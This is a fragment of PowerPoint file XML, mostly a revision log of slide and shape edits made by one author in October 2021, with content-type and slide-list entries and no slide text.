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notesSlides/notesSlide9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink31.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink32.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide10.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1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink37.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink38.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide12.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink39.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink40.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide13.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72" r:id="rId4"/>
    <p:sldId id="273" r:id="rId5"/>
    <p:sldId id="274" r:id="rId6"/>
    <p:sldId id="286" r:id="rId7"/>
    <p:sldId id="275" r:id="rId8"/>
    <p:sldId id="295" r:id="rId9"/>
    <p:sldId id="278" r:id="rId10"/>
    <p:sldId id="279" r:id="rId11"/>
    <p:sldId id="280" r:id="rId12"/>
    <p:sldId id="281" r:id="rId13"/>
    <p:sldId id="282" r:id="rId14"/>
    <p:sldId id="267" r:id="rId15"/>
    <p:sldId id="296" r:id="rId16"/>
    <p:sldId id="287" r:id="rId17"/>
    <p:sldId id="293" r:id="rId18"/>
    <p:sldId id="284" r:id="rId19"/>
    <p:sldId id="285" r:id="rId20"/>
    <p:sldId id="288" r:id="rId21"/>
    <p:sldId id="292" r:id="rId22"/>
    <p:sldId id="289" r:id="rId23"/>
    <p:sldId id="294" r:id="rId24"/>
    <p:sldId id="259" r:id="rId25"/>
    <p:sldId id="290" r:id="rId26"/>
    <p:sldId id="299" r:id="rId27"/>
    <p:sldId id="298" r:id="rId28"/>
    <p:sldId id="300" r:id="rId29"/>
    <p:sldId id="301" r:id="rId30"/>
    <p:sldId id="297" r:id="rId31"/>
    <p:sldId id="276" r:id="rId32"/>
    <p:sldId id="266" r:id="rId33"/>
    <p:sldId id="291" r:id="rId34"/>
    <p:sldId id="303" r:id="rId35"/>
    <p:sldId id="304" r:id="rId36"/>
    <p:sldId id="302" r:id="rId37"/>
    <p:sldId id="307" r:id="rId38"/>
    <p:sldId id="305" r:id="rId39"/>
    <p:sldId id="308" r:id="rId40"/>
    <p:sldId id="309" r:id="rId41"/>
    <p:sldId id="312" r:id="rId42"/>
    <p:sldId id="264" r:id="rId43"/>
    <p:sldId id="310" r:id="rId44"/>
    <p:sldId id="311" r:id="rId45"/>
    <p:sldId id="313" r:id="rId46"/>
    <p:sldId id="306" r:id="rId47"/>
    <p:sldId id="268" r:id="rId48"/>
    <p:sldId id="27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00"/>
    <a:srgbClr val="007DB5"/>
    <a:srgbClr val="AEAEAE"/>
    <a:srgbClr val="AB51D6"/>
    <a:srgbClr val="D81E00"/>
    <a:srgbClr val="00AAD6"/>
    <a:srgbClr val="318EFD"/>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A55DE-8B87-4F8A-80F1-D0C196067A28}" v="217" dt="2023-01-20T23:57:13.43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0" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="840" y="9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835C2824-055A-4356-B4DE-4378ABF214B6}"/>
    <pc:docChg chg="undo redo custSel addSld delSld modSld sldOrd">
      <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T15:21:19.852" v="1815" actId="47"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="delSp modSp mod modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T20:38:07.194" v="667" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1323245308" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T20:38:07.194" v="667" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1323245308" sldId="256"/>
            <ac:spMk id="2" creationId="{B476BAF9-88AC-4600-B511-347782B9C875}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T15:09:34.680" v="11" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1323245308" sldId="256"/>
            <ac:picMk id="4" creationId="{73C2B94F-CA81-429B-AA4B-3D57017F2C90}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T18:18:55.073" v="448" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="870868014" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T18:18:55.073" v="448" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="870868014" sldId="257"/>
            <ac:spMk id="2" creationId="{A489FB06-1FE8-426C-89BD-65F5EAC123A1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T16:09:48.107" v="225" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="870868014" sldId="257"/>
            <ac:spMk id="3" creationId="{8569A72D-5CA7-4D07-8662-FEC3307887A2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T16:10:07.390" v="227" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="870868014" sldId="257"/>
            <ac:picMk id="5" creationId="{9C00E5CB-379D-4598-8055-844BE852F676}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T15:09:30.801" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="239878079" sldId="258"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T15:34:24.279" v="208" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2896575825" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T15:33:48.791" v="205" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2896575825" sldId="258"/>
            <ac:spMk id="2" creationId="{4EAF6536-B49E-4F99-8ACD-743B39492678}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T15:33:48.791" v="205" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2896575825" sldId="258"/>
            <ac:spMk id="3" creationId="{4073835E-0E65-4F10-A198-A5B7930A22D1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T15:34:24.279" v="208" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2896575825" sldId="258"/>
            <ac:picMk id="5" creationId="{324E9C09-524B-4340-A5EF-9CA1D5B20498}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T16:20:10.021" v="308" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="40733756" sldId="259"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T16:18:04.315" v="301" actId="313"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="40733756" sldId="259"/>
            <ac:spMk id="2" creationId="{557B336A-20F0-44F6-954F-43F30A6776F3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T16:18:00.878" v="300" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="40733756" sldId="259"/>
            <ac:spMk id="3" creationId="{CEEEB140-EACA-4ACD-A856-638419BD0996}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T16:20:10.021" v="308" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="40733756" sldId="259"/>
            <ac:spMk id="5" creationId="{F4CFF10E-AAF9-4905-AB34-D9006EEE79E7}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T15:09:30.990" v="1" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3825957635" sldId="259"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod ord">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T20:37:45.628" v="665" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1339347841" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T20:35:31.237" v="524" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1339347841" sldId="260"/>
            <ac:spMk id="2" creationId="{B3540C25-70B8-49D0-A952-86DA407013AA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T20:37:22.109" v="652" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1339347841" sldId="260"/>
            <ac:spMk id="3" creationId="{D6CD1BF6-B62C-4115-830F-11D20FFDEC31}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T16:24:34.231" v="325" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1339347841" sldId="260"/>
            <ac:spMk id="4" creationId="{B51B0EBC-B052-45E8-B72C-CA9813436D19}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T20:37:39.480" v="657" actId="11529"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1339347841" sldId="260"/>
            <ac:spMk id="16" creationId="{6B0605DE-3005-42DF-862B-1E2C673104CB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T20:37:45.628" v="665" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1339347841" sldId="260"/>
            <ac:spMk id="17" creationId="{20D5CFFB-92C0-4894-A5E4-6D7C9FDABA01}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add del mod modGraphic">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T16:28:00.241" v="351" actId="1032"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1339347841" sldId="260"/>
            <ac:graphicFrameMk id="5" creationId="{9CC70A6C-B83F-4319-9525-E02AE8ED9258}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="add del mod modGraphic">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T16:29:39.248" v="372" actId="1032"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1339347841" sldId="260"/>
            <ac:graphicFrameMk id="6" creationId="{17210B76-3EBF-4F47-B987-680E040CF21E}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="add del mod modGraphic">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T16:33:35.472" v="423" actId="478"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1339347841" sldId="260"/>
            <ac:graphicFrameMk id="7" creationId="{EE30EABE-404E-4B1F-87A8-4D0E309B3439}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T16:39:39.196" v="434" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1339347841" sldId="260"/>
            <ac:picMk id="8" creationId="{478F9DF9-A99C-4F68-811C-852CB7D1775C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T16:41:20.219" v="442" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1339347841" sldId="260"/>
            <ac:picMk id="1026" creationId="{CE26BB45-3295-498B-8BEC-8333B673FB21}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T20:37:36.291" v="656" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1339347841" sldId="260"/>
            <ac:picMk id="1028" creationId="{9D4B51D1-699A-43BC-9A8F-6F0FC055D109}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T20:34:18.361" v="516" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1339347841" sldId="260"/>
            <ac:cxnSpMk id="6" creationId="{7455D4BA-66A2-4285-A146-4076FF15C671}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T20:34:18.361" v="516" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1339347841" sldId="260"/>
            <ac:cxnSpMk id="8" creationId="{C42F20E1-DDC8-4519-BAD1-44834B28AF60}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T20:34:18.361" v="516" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1339347841" sldId="260"/>
            <ac:cxnSpMk id="10" creationId="{AE0D98FD-B051-4DE1-90CE-489BA4C00B22}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T20:34:18.361" v="516" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1339347841" sldId="260"/>
            <ac:cxnSpMk id="12" creationId="{66EDB369-4519-40E8-8669-B16743A300EB}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T20:34:18.361" v="516" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1339347841" sldId="260"/>
            <ac:cxnSpMk id="13" creationId="{523E1443-0A2E-4F04-A742-9B3629653501}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T20:34:18.361" v="516" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1339347841" sldId="260"/>
            <ac:cxnSpMk id="14" creationId="{90CB0150-A91C-4E27-9CA1-087D0AA3D2F6}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T20:34:18.361" v="516" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1339347841" sldId="260"/>
            <ac:cxnSpMk id="15" creationId="{686D738C-9CC4-4899-BD0D-733159113F45}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T02:21:59.553" v="681" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1706942394" sldId="261"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T20:22:25.206" v="452" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1706942394" sldId="261"/>
            <ac:spMk id="2" creationId="{4023EDE1-57F4-49B9-8657-B53181F7CC6C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T20:22:25.206" v="452" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1706942394" sldId="261"/>
            <ac:spMk id="3" creationId="{AE79C36D-CC47-4A62-A788-57070A643E2C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T20:23:29.640" v="461" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1706942394" sldId="261"/>
            <ac:spMk id="4" creationId="{78371DDA-B5B9-4B6F-B865-4C44A580A370}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T20:38:29.844" v="668" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1706942394" sldId="261"/>
            <ac:spMk id="10" creationId="{E0251681-794E-423D-B7D9-0A777F026710}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T20:23:34.164" v="462" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1706942394" sldId="261"/>
            <ac:picMk id="6" creationId="{A9861367-77EC-4C70-B45D-FECFDEF75816}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T20:23:17.898" v="459" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1706942394" sldId="261"/>
            <ac:picMk id="8" creationId="{5DFBD8EB-6926-46B4-91BA-2DE22D39C526}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T02:21:57.215" v="680" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1706942394" sldId="261"/>
            <ac:picMk id="1026" creationId="{D2B91372-F83A-4E8A-9506-2E0BE08B05DA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T02:21:35.911" v="676"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1706942394" sldId="261"/>
            <ac:picMk id="1028" creationId="{3AA81D9E-535E-4A59-A201-650E4E7504BE}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T02:21:59.553" v="681" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1706942394" sldId="261"/>
            <ac:picMk id="1030" creationId="{97FD0BFC-1E55-43C7-BCE3-FA92EB8B8722}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T15:09:31.140" v="2" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2106921854" sldId="261"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T03:33:17.848" v="1052" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="842289078" sldId="262"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T02:22:59.732" v="729" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="842289078" sldId="262"/>
            <ac:spMk id="2" creationId="{0504367D-7F58-4E40-8F3E-E0CF55E10DEC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T03:33:17.848" v="1052" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="842289078" sldId="262"/>
            <ac:spMk id="3" creationId="{D6DC6760-2956-485D-BF95-505F87020A8D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T15:09:31.292" v="3" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4165750362" sldId="262"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T15:09:31.444" v="4" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2635193244" sldId="263"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="new del">
